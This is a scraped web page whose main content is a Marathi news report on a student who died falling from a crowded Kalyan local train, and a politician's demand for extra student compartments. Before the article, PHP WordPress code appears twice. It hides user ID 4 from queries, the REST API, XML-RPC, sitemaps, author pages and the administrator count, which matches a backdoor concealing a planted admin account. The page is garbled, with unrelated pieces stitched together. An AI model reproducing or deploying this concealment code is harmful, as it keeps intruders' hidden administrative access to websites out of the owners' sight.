add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
विद्यार्थ्यांच्या सुरक्षेसाठी लोकल ट्रेनमध्ये तातडीने अतिरिक्त डबे सुरू करा – वल्ली राजन यांची मागणी - crimeaala.com
दि.१४कल्याण :१२वीच्या परीक्षेसाठी जात असताना गर्दीच्या लोकल ट्रेनमधून पडून १८ वर्षीय विद्यार्थी स्व. सचिन काथरे याचा झालेला दुर्दैवी मृत्यू हा केवळ अपघात नसून, उपनगरीय रेल्वे व्यवस्थेतील गंभीर दुर्लक्ष आणि विद्यार्थ्यांच्या सुरक्षेबाबतची बेफिकिरी उघड करणारी घटना असल्याची तीव्र प्रतिक्रिया वल्ली राजन, राज्य सचिव – राष्ट्रवादी काँग्रेस पार्टी – शरदचंद्र पवार यांनी व्यक्त केली आहे.
या घटनेच्या पार्श्वभूमीवर वल्ली राजन यांनी कल्याण रेल्वे स्टेशन व्यवस्थापकांना निवेदन सादर करत परीक्षा कालावधीत विद्यार्थ्यांसाठी अतिरिक्त लोकल गाड्या तसेच स्वतंत्र, सुरक्षित डबे तातडीने सुरू करण्याची ठोस मागणी केली आहे. यावेळी राष्ट्रवादी काँग्रेस पार्टी – विमुक्त भटक्या जमाती सेलचे कल्याण जिल्हाध्यक्ष दिनेश परदेशी आणि समाजसेवक तोषेश लक्ष्मीपती शुक्ला उपस्थित होते.
दरवर्षी परीक्षा काळात हजारो विद्यार्थी प्रचंड गर्दीत, जीव धोक्यात घालून लोकल ट्रेनमधून प्रवास करतात. ही बाब प्रशासनाच्या पूर्णपणे निदर्शनास असतानाही अद्याप ठोस उपाययोजना न होणे अत्यंत दुर्दैवी असल्याचे त्यांनी सांगितले. ज्या पद्धतीने वरिष्ठ नागरिक आणि दिव्यांगांसाठी विशेष सुविधा उपलब्ध करून देण्यात आल्या आहेत, त्याच धर्तीवर किमान १२वीपर्यंतच्या विद्यार्थ्यांसाठी स्वतंत्र आणि सुरक्षित “Student Special Compartment” सुरू करणे काळाची गरज असल्याचेही त्यांनी स्पष्ट केले.
प्रमुख मागण्या :
परीक्षा कालावधीत अतिरिक्त लोकल गाड्या किंवा डबे तातडीने सुरू करावेत. १२वीपर्यंतच्या विद्यार्थ्यांसाठी स्वतंत्र व सुरक्षित डबे उपलब्ध करून द्यावेत. पीक अवर्समध्ये गर्दी नियंत्रणासाठी विशेष नियोजन व कडक अंमलबजावणी करावी.
“मानवी जीवन हे कोणत्याही व्यवस्थेपेक्षा अधिक मौल्यवान आहे. आणखी कोणत्याही विद्यार्थ्याचा जीव जाण्यापूर्वी प्रशासनाने तात्काळ ठोस निर्णय घ्यावेत,” असा इशारा वल्ली राजन यांनी यावेळी दिला.